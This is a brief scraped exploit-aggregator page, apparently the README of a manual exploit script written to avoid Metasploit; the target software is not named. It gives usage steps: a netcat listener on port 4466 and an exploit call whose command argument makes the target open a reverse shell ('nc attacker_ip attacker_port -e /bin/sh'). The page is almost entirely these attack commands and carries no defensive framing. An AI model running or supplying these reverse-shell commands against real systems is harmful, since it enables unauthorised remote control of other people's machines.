## https://sploitus.com/exploit?id=C23FFD4E-E977-5B2D-A812-6067C16212D5
The goal of this script NOT to use Metasploit and to do it manually.
Usage:
nc -lvnp 4466
Running the exploit:
python3 ./exploit.py -t target_ip -p target_port -c "nc attacker_ip attacker_port -e /bin/sh"